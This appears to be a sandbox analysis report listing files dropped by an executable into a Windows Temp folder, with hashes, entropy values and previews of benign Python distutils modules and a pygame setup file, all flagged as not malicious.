                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:HMZMrNErRQ3qBNMdxjlxzobRDiPQbjO6Cx2rokokoMazCqDg:HMZMZEFDnMbjzhQbrokokovzCqDg
                                                                                                                                            MD5:22AAEAC9EA49EF0B020CAE304F2F4F72
                                                                                                                                            SHA1:AB43D35A8171D98F71A3CA75CA94305C4419AC83
                                                                                                                                            SHA-256:668C99E076DFB95E014829C4028460DEE94A32B1FBB1C44116DFFBF2DC48BF5B
                                                                                                                                            SHA-512:6FC54D91C1D968BFE6D8AFF1D1339110C359340AE9C061ACBE3521D65889B4A3977033410883AD6F3E0C8E21D4AD00F8A6BFDBCEB53FF112BD59E09933CBEB07
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:"""distutils.command.x....Implements the Distutils 'x' command..."""....# created 2000/mm/dd, John Doe....__revision__ = "$Id$"....from distutils.core import Command......class x(Command):.... # Brief (40-50 characters) description of the command.. description = "".... # List of option tuples: long name, short name (None if no short.. # name), and help string... user_options = [('', '',.. ""),.. ].... def initialize_options(self):.. self. = None.. self. = None.. self. = None.... def finalize_options(self):.. if self.x is None:.. self.x = .... def run(self):..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24294
                                                                                                                                            Entropy (8bit):5.336553165689798
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:6MFmocnDTtvYwA4BYdy56xfIC1IeDI2vCMViMFkYrR3cbnyVXHEQ5xBqCqt3T:GoCTGwA4BuyjZeDIbMViMSY52yVXkQ5S
                                                                                                                                            MD5:4318D310188A97AAE757516B63F7FC73
                                                                                                                                            SHA1:CFE9C7C4B2FC20F4C17EB824A1C4C3663AE6B287
                                                                                                                                            SHA-256:B1E4ECE2C6DB363F839E88D8727D7BA661468DCEFD45DC1E9C14BA63D18A93A5
                                                                                                                                            SHA-512:51CCAD32D4ECEFB1BD7A59E105E7CCA19958D0E0FF262089893D7C813EC8CAC4C71196B5213A10F0D5C97E0E8E820A4BA08B877EF2E5DA9DECCD94FA087A5034
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8704
                                                                                                                                            Entropy (8bit):5.221301685929321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:DFRqTOE9Ka2dxkab1fB3EV7ZeWLu7AYGnEOXUkErlTB:DFRqTn9Ka+xF1fVEVoN7qEOXUkErlTB
                                                                                                                                            MD5:D84DAA01416B2BCF17406C89D081E7FA
                                                                                                                                            SHA1:392D4BBA3893D31A473FEB7514BCA8FBEFC2C5D3
                                                                                                                                            SHA-256:AE7BC54F68EB3C87119975A1A11C37D334C0A1EC8AB0AC942B0210F9EAA3114C
                                                                                                                                            SHA-512:52A51DCE5518CFC8766940D97B33FE1061D16BD8F2C3D47C480CE1E6AEE76E08EDEC6876488D2BEDC59D12DCFAFC51E86ABB519F225CAEFE2B34D08E03BCF907
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3158
                                                                                                                                            Entropy (8bit):5.265204926436665
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:yo2Kjd1uqoubv/ClY2jkPBhMPZKl28gKdEfFjDDYccH4ifesQHlALoYYMC5nkh:8Kjd1upGWHOqmKKz34UWlIoYYMUkh
                                                                                                                                            MD5:405542E49746887545BDEACE27394BAC
                                                                                                                                            SHA1:8108D4F19CEB18FEEFCF405866A1538B25E71F28
                                                                                                                                            SHA-256:4C597C5BD5D4896EAFBD743968FFB4DFB7C8601917F4F9D06B58161175757DCE
                                                                                                                                            SHA-512:B8FED24FC746C546F2A987ED819FD7BDE7FC9D25B01789F266325B7F5FD2D16CCB09A2227CB8C15DF56480461BCEC869D192B3900963913432395F93D700663F
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15657
                                                                                                                                            Entropy (8bit):5.39619918887626
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ktoJcmc6zE048C0s0F0NcDuiUMLdzv8bWrZ:ktmc6wWDJxzv8yV
                                                                                                                                            MD5:0ED85C837B9EB9FF85000ABE65334B0E
                                                                                                                                            SHA1:2D8D0E612DE57DDC589A3356BEA264B0B302FE9A
                                                                                                                                            SHA-256:81D30DFED76591AFB166C11460B6DA3808B951DDFA2731837C063932F9D7B542
                                                                                                                                            SHA-512:6F6B8A8153DC19D131116FD3DB43B1D2D7EFC72D1F141969DBE327AF9624DF477C0C0D21A555405CEB7A3841F8231140D7F352D7FED41472FB6FD408072C1882
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23851
                                                                                                                                            Entropy (8bit):5.315882230982691
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10418
                                                                                                                                            Entropy (8bit):5.485728762632312
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6414
                                                                                                                                            Entropy (8bit):5.473688643013213
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9084
                                                                                                                                            Entropy (8bit):5.574703867294831
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):323
                                                                                                                                            Entropy (8bit):5.0534383161329615
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3998
                                                                                                                                            Entropy (8bit):5.3177943774656535
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10065
                                                                                                                                            Entropy (8bit):5.345970238578514
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54775
                                                                                                                                            Entropy (8bit):5.401387265478596
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6786
                                                                                                                                            Entropy (8bit):5.080927147144127
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10186
                                                                                                                                            Entropy (8bit):5.594072759960634
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.*........................B.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...G.d...d...............Z.d...Z.d.S.).zmdistutils.extension..Provides the Extension class, used to describe C/C++ extension.modules in setup scripts......Nc.....................<.....e.Z.d.Z.d.Z.............................d.d...Z.d...Z.d.S.)...Extensiona....Just a collection of attributes that describes an extension. module and everything needed to build it (hopefully in a portable. way, but there are hooks that let you be as unportable as you need)... Instance attributes:. name : string. the full name of the extension, including any packages -- ie.. *not* a filename or pathname, but Python dotted name. sources : [string]. list of source filenames, relative to the distribution root. (where the setup script lives), in Unix form (slash-separated). for portability. Source files may be C, C++, SWIG (.i),. platform-specific resource files, or whatever else i
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17139
                                                                                                                                            Entropy (8bit):5.497762606012419
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:aFGQ0Zef4xlW9koIRYbTsIUSA9dvbAWs49qDpJuOyqWcg6e/ALZZScq07nqea99q:ab0Z02oIrvjPylJuvtdYGinmKqUn
                                                                                                                                            MD5:1F681E43725A296FDD814073452E2979
                                                                                                                                            SHA1:373A38EB9424634EB12186EAAA83E1C9044673D0
                                                                                                                                            SHA-256:1526E9CCF0A55324B1087661654F1409B09A3010C4DE56CFAA8CDBFEF425CB86
                                                                                                                                            SHA-512:06273C76E8E892C020A77D215F8106B080EE928F0CB5675EF9BFF5FA64B7AB08C661B36456B9894AD8C5F24DB34DE469DFC52C7004914D8EED892EB80A014DBE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dAG.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.Z...e.j.........d.e.z.................Z...e.j.........d.e...d.e...d.................Z.e.......................d.d...............Z...G.d...d...............Z.d...Z.d...e.j.........D...............Z.d...Z.d...Z...G.d...d...............Z.e.d.k.....rGd.Z.d.D.]DZ...e.d.e.z.....................e.d.........................e.e.e...............................................e..................Cd.S.d.S.).a6...distutils.fancy_getopt..Wrapper around the standard getopt module that provides the following.additional features:. * short and long options are tied together. * options have help strings, so fancy_getopt could potentially. create a complete usage summary. * options set attributes of a passed-in object......N)...*z.[a-zA-Z](?:[a-zA-Z0-9-]*)z.^%s$z.^(z.)=!(z.)$..-.._c.....................p.....e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d.d...Z.d.d...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10407
                                                                                                                                            Entropy (8bit):5.5951373459117395
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:8/vS7bkB+TIb7zL8ViWlnpuXOP8sXtJmYSrIAa8y5j:AvS/4kk738ViUnp3ksXiBIAry
                                                                                                                                            MD5:E48A2E6445FBE3C2502F2297006D5C3B
                                                                                                                                            SHA1:004FAB14397C33E4C012BD9B206FD79BB2805F2C
                                                                                                                                            SHA-256:34BFC9003F4505E020E0A6B01C763ACBDF3ECDDD6DC5104F67BAFDCCA1234DEA
                                                                                                                                            SHA-512:F2C3940C949640E236570ABA2C2189BA23F106659E9E3CA84AA2625F0E0973E0B59071EDDD4D75FDB72DE0818D2FEA51D87F4C74521A73F62C633BAFDFD1E664
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d. ........................\.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d.d...Z.d.d...Z.....d.d...Z.....d.d...Z.d...Z.d.S.).zFdistutils.file_util..Utility functions for operating on single files.......N)...DistutilsFileError)...log..copyingz.hard linkingz.symbolically linking).N..hard..sym..@..c..........................d.}.d.}.....t...........|.d...............}.n,#.t...........$.r.}.t...........d.|...d.|.j.............................d.}.~.w.w.x.Y.w.t...........j...............................|...............rB..t...........j.........|.................n,#.t...........$.r.}.t...........d.|...d.|.j.............................d.}.~.w.w.x.Y.w...t...........|.d...............}.n,#.t...........$.r.}.t...........d.|...d.|.j.............................d.}.~.w.w.x.Y.w.....|.......................|...............}.n,#.t...........$.r.}.t...........d.|...d.|.j.............................d.}.~.w.w.x.Y.w.|.s.nD..|.......................|.................n,#.t...........$.r.}.t....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16202
                                                                                                                                            Entropy (8bit):5.403760966962896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Mz4k1rB4dR0iELR4oEdLBUW/ctiVntLBGLqq/T2wQ1qKKUPe5xcOmn7i9dhHTd:Hyrm0jdyLdntLwLqqKHHPe5i7oR
                                                                                                                                            MD5:92F3B606D5185A3252FE04A0293D6816
                                                                                                                                            SHA1:70D157EEEB4DE27F0344176A1D1786E88096A0A0
                                                                                                                                            SHA-256:93E7E5045715FA2BACAA519B442F4C985A4570EA1132CF50E41B766BB944B946
                                                                                                                                            SHA-512:FD6E9C5C66A38A3EE8C5B023E27011C99C2EEDDC148623D342F683E7E53BD47B26CCEC9F5F452F13AD21DC840D5E55432634A55128C1EA03F252B84DE5E753EA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dg3.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d...............Z.d...Z.e.j.........f.d...Z.d...Z.d.d...Z.d.S.).zsdistutils.filelist..Provides the FileList class, used for poking about the filesystem.and building lists of files.......N....convert_path)...DistutilsTemplateError..DistutilsInternalError)...logc.....................p.....e.Z.d.Z.d.Z.d.d...Z.d...Z.e.j.........f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z...d.d...Z.d.S.)...FileLista....A list of files built by on exploring the filesystem and filtered by. applying various patterns to what we find there... Instance attributes:. dir. directory from which files will be taken -- only used if. 'allfiles' not supplied to constructor. files. list of filenames currently being built/filtered/manipulated. allfiles. complete list of files under consideration (ie. without any. filtering appli
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3931
                                                                                                                                            Entropy (8bit):4.776480183905678
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JzFzhkuYdIQkmZ4X/XEHLUqYYWNI4Iv8SK03:Jz7kHdmmK/UHG1wB
                                                                                                                                            MD5:9EEE8C4FFDA6D1FD64F08D502A21BD47
                                                                                                                                            SHA1:5FCA23BB2316D08E0F061285E83C6CC93FE7F562
                                                                                                                                            SHA-256:6373D9C7D4DE6596A7F11F9B783924378F8A1D057D0BA8DA307315429DDD071F
                                                                                                                                            SHA-512:9E8BFE035C525B11C2C0861B76CD71C1E419A0EF31261C2D505A833D0090FE813B48264F8E6A5B0988F6EDE3CED27F9DE81C0C03557CE32222A66B29D8791E5D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d...............................d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z...G.d...d...............Z...e...............Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.d...Z.d...Z.d.S.).z,A simple log mechanism styled after PEP 282...............................Nc.....................B.....e.Z.d.Z.e.f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...Logc...........................|.|._.........d.S...N)...threshold)...selfr....s.... .SC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\distutils\log.py..__init__z.Log.__init__....s........".............c...........................|.t...........t...........t...........t...........t...........f.v.r.t...........d.t...........|...............z...................|.|.j.........k.....r.|.r.|.|.z...}.|.t...........t...........t...........f.v.r.t...........j.........}.n.t...........j.........}...|.......................d.|.z...................nX#.t...........$.rK..|.j.........}.|.......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33195
                                                                                                                                            Entropy (8bit):5.4277119439037165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:vk2yOZu1VPMiS2PP6K2r2edqenQLuH2yNV8YSxMRz3MY65Rs7tePihAbDGT+SGjj:vaLVP7bPm7CuJSxMhMY6Ds7kbDGT+H3
                                                                                                                                            MD5:322FF9D4C6F9CC85B0984AA006C33656
                                                                                                                                            SHA1:707B646DC282F59382C95D2E55433BC4008B2B67
                                                                                                                                            SHA-256:10B542E7A329EEC1D9B37CA9DD29F50906DCFC9B8276D6AA80C624D2C215F6E6
                                                                                                                                            SHA-512:60BC831B23CC92072B4ADE9BA32D14DB5D92B663D5C6C68B84E9AE600E1FB86EC766A0E315494DCAB282453E739C1DE5700B2554CB33D1169F31F91D30EBB225
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.z..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........e.j.........e.j.........e.j.........f.Z.e.j ........d.k.....o.e.j!........d.k.....Z"e"r.d.Z#d.Z$d.Z%n.d.Z#d.Z$d.Z%d.d.d...Z&..G.d...d...............Z'..G.d...d...............Z(d...Z)d...Z*d...Z+d...Z,d.d...Z-..e)..............Z.e.d.k.....r...e.d.e.z.....................G.d...d.e...............Z/d.S.) a....distutils.msvc9compiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for the Microsoft Visual Studio 2008...The module is compatible with VS 2005 and VS 2008. You can find legacy support.for older versions of VS in distutils.msvccompiler.......N)...DistutilsExecError..DistutilsPlatformError..CompileError..LibError..LinkError)...CCompiler..gen_lib_options)...log)...get_platform..win32l..........z1Software\Wow6432Node\Microsoft\VisualStud
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5640
                                                                                                                                            Entropy (8bit):5.555965488054044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BduIwCA+wi8G2p5lHe0gerjtL7VPDVCK+XIU859hHfOGsu5pR0KKw:vBwA8GiDHe0ZrjzPDVCVmrJn57V
                                                                                                                                            MD5:44B9BCF65CCA641D86DE3A40C1863CAD
                                                                                                                                            SHA1:521B088E809716B46185F1D03690D9149691D36F
                                                                                                                                            SHA-256:A7483225705813593321EBE66330B82A0BAC480B52C40BD78B0F0C6E57301EC2
                                                                                                                                            SHA-512:DEDDCC62957AD43D5EAB38B5335C646311069EE7B0DC5FB48C7483BE16BF66A1D07A3FE1BCB2A9B484BB050FB5A1292F397FCEF99C58548611499678A9472617
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................x.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........d.k.....r.d.a.d.a.d.d...Z.d.d...Z.d.S.).z.distutils.spawn..Provides the 'spawn()' function, a front-end to various platform-.specific functions for launching another program in a sub-process..Also provides the 'find_executable()' to search the path for a given.executable name.......N)...DistutilsPlatformError..DistutilsExecError)...DEBUG)...log..darwin.....c...........................t...........|...............}.t...........j.........d.......................|...............................|.r.d.S.|.r.t...........|.d.........................}.|...|.|.d.<...d.}.t...........j.........d.k.....r.t............Hd.d.l.m.}...|.......................d...............p.d.a.t...........r$d...t.................................d...............D...............a.t...........r.t...........j...............................d.t.........................}.d...|.......................d..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2710054441601521595366135927832313856.000000, slope 41956278318569943652431214673920.000000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12130
                                                                                                                                            Entropy (8bit):5.6024200841349145
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:pm+MfS3mIDzYtkpoADqE3Rgz3NyPOFXUFvAVRIKkFDa2soiShh1:pXMfkzYtDyJ3I3ooUlAwxDtiShh1
                                                                                                                                            MD5:577B3131DCDC85D9B0DC523E1ADDF247
                                                                                                                                            SHA1:04D74BF989D1A14E8A1DE8579165F005E76B9B52
                                                                                                                                            SHA-256:4DCD6BFE62E900114328BCAC4B6BB7B6B76941215391411C45A3EA23AEB53F22
                                                                                                                                            SHA-512:956CEDFE0556FC5319EDC559BDC38A6C15F0BF23CE433178C92575BFA23BFA42EDCF19ACED7BD965641BC0296B364BF086E045F19F42C02964EF7BC2B0BE452C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.1........................x.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%....e#..............Z&..e.j'........d.e(d...................d.d...Z...e.e d.................Z)..e.e.e&..............Z...e.e.e&..............Z*d.d...Z+d.Z,..e.s.e.j-........Z,n.#.e.$.r...Y.n.w.x.Y.w.d...Z/d.d...Z0d.d...Z1d.S.).a....Provide access to Python's configuration information. The specific.configuration variables available depend heavily on the platform and.configuration. The values may be retrieved using.get_config_var(name), and the list of variables is available via.get_config_vars().keys(). Additional convenience functions are also.available...Written by: Fred L. Drake, Jr..Email: <fdrake@acm.org>......N)...partial.....)...DistutilsPlatformError)..._PREFIX.._BASE_PREFIX.._EXEC_PREFIX.._BASE_EXEC_PREFIX.._PROJECT_BASE.._PYTHON_BUILD.._init_posix..parse_config_h.._init_non_p
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2316
                                                                                                                                            Entropy (8bit):5.282952703364592
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:TjHz6OWrjdOWvfAhBLwJavNtC/I2F/7/R:TjHz1WrLfAfLGeNtCguzR
                                                                                                                                            MD5:DF9E521298E69638AB56F18A9FF4F6D4
                                                                                                                                            SHA1:9FF052BDDBC2BBBC175DC69E0FBA9673D91A9F74
                                                                                                                                            SHA-256:21171D590D7F57CFF24C6F223EA8A92BE0587B709CA7B8A6EC52CD8CD388DDB7
                                                                                                                                            SHA-512:FF88DEEA6DD10F175D78E53090976C392E850B8E0D907D2A9953FC4A04D6E1CB685BFBF3F9107A9A04FF3F0C8C6797C156E41279BE8A2780A43E8C84A6BAB18B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# Setup file from the pygame project....#--StartConfig..SDL = -I/usr/include/SDL -D_REENTRANT -lSDL..FONT = -lSDL_ttf..IMAGE = -lSDL_image..MIXER = -lSDL_mixer..SMPEG = -lsmpeg..PNG = -lpng..JPEG = -ljpeg..SCRAP = -lX11..PORTMIDI = -lportmidi..PORTTIME = -lporttime..#--EndConfig....#DEBUG = -C-W -C-Wall..DEBUG = ....#the following modules are optional. you will want to compile..#everything you can, but you can ignore ones you don't have..#dependencies for, just comment them out....imageext src/imageext.c $(SDL) $(IMAGE) $(PNG) $(JPEG) $(DEBUG)..font src/font.c $(SDL) $(FONT) $(DEBUG)..mixer src/mixer.c $(SDL) $(MIXER) $(DEBUG)..mixer_music src/music.c $(SDL) $(MIXER) $(DEBUG).._numericsurfarray src/_numericsurfarray.c $(SDL) $(DEBUG).._numericsndarray src/_numericsndarray.c $(SDL) $(MIXER) $(DEBUG)..movie src/movie.c $(SDL) $(SMPEG) $(DEBUG)..scrap src/scrap.c $(SDL) $(SCRAP) $(DEBUG).._camera src/_camera.c src/camera_v4l2.c src/camera_v4l.c $(SDL) $(DEBUG)..pypm src/pypm.c $(SDL) $(PO
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.873140679513133
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:hWVFlPBA9yn:hqdBA0n
                                                                                                                                            MD5:9605CD64DE6D82DAAC01453FC2AEE5C9
                                                                                                                                            SHA1:9C74128DC18F5F0CA801B7D281E0A10AB80298D6
                                                                                                                                            SHA-256:86BEC3A28C9EDC7855C0519E3B2FA1F840813FCF8AE67A55F7183980DB20FE93
                                                                                                                                            SHA-512:9C2EE2CD62978B2A456F65F9D1779726D4982BEC8F3EFF207707308C1E5FE11D62BBC990948A7DCA68E4141AC8A903DD5F2D1AA54D9414B2AB880D3F7AFCD9A5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:This should be included...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11537
                                                                                                                                            Entropy (8bit):5.3673087914052005
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.1........................4.....d.Z.d.d.l.Z.d.d.l.Z...G.d...d...............Z.d.S.).z.text_file..provides the TextFile class, which gives an interface to text files.that (optionally) takes care of stripping comments, ignoring blank.lines, and joining lines with backslashes......Nc.....................d.....e.Z.d.Z.d.Z.d.d.d.d.d.d.d.d...Z.d.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d.S.)...TextFilea....Provides a file-like object that takes care of all the things you. commonly want to do when processing a text file that has some. line-by-line syntax: strip comments (as long as "#" is your. comment character), skip blank lines, join adjacent lines by. escaping the newline (ie. backslash at end of line), strip. leading and/or trailing whitespace. All of these are optional. and independently controllable... Provides a 'warn()' method so you can generate warning messages that. report physical line number, even if
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12702
                                                                                                                                            Entropy (8bit):5.44236244993963
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d+;.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.........d.k.....r.d.d.l.Z...G.d...d.e...............Z.d.S.).a9...distutils.unixccompiler..Contains the UnixCCompiler class, a subclass of CCompiler that handles.the "typical" Unix-style command-line C compiler:. * macros defined with -Dname[=value]. * macros undefined with -Uname. * include search directories specified with -Idir. * libraries specified with -lllib. * library search directories specified with -Ldir. * compile handled by 'cc' (or similar) executable with -c option:. compiles .c to .o. * link static library handled by 'ar' command (possibly with 'ranlib'). * link shared library handled by 'cc -shared'......N)...sysconfig)...newer)...CCompiler..gen_preprocess_options..gen_lib_options)...DistutilsExecError..CompileError..LibError..LinkError)...log..darwinc...........................e.Z.d.Z.d.Z.d.d.g.d.g.d.g.d.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24708
                                                                                                                                            Entropy (8bit):5.543088526966538
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dZT..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.d.a.d...Z.d...Z.d.d...Z.d.x.a.x.a.a.d...Z.d...Z.d.d...Z.d...Z.........d.d...Z.d...Z d.d...Z!....d.d...Z"..G.d...d...............Z#d.S.) zudistutils.util..Miscellaneous utility functions -- anything that doesn't fit into.one of the other *util.py modules.......N)...DistutilsPlatformError)...newer)...spawn)...log)...DistutilsByteCompileErrorc...........................t...........j.........d.k.....rrd.t...........j.............................................v.r.d.S.d.t...........j.............................................v.r.d.S.d.t...........j.............................................v.r.d.S.t...........j.........S.d.t...........j.........v.r.t...........j.........d...........S.t...........j.........d.k.....s.t...........t...........d...............s.t...........j.........S.t...........j................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10403
                                                                                                                                            Entropy (8bit):5.271983653695327
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
